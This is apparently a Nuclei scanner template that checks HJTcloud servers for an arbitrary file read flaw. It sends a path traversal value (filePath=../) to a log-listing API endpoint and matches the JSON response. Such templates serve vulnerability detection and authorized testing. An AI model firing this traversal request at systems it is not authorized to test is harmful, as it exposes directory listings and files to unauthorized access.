id: hjtcloud-rest-arbitrary-file-read

info:
  name: HJTcloud Arbitrary file read
  author: pikpikcu
  severity: low
  reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
  tags: hjtcloud,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"name":'
          - '"length":'
          - '"filePath":'
          - '"list":'
        condition: and
        part: body

      - type: word
        words:
          - "application/json"
        part: header

      - type: status
        status:
          - 200
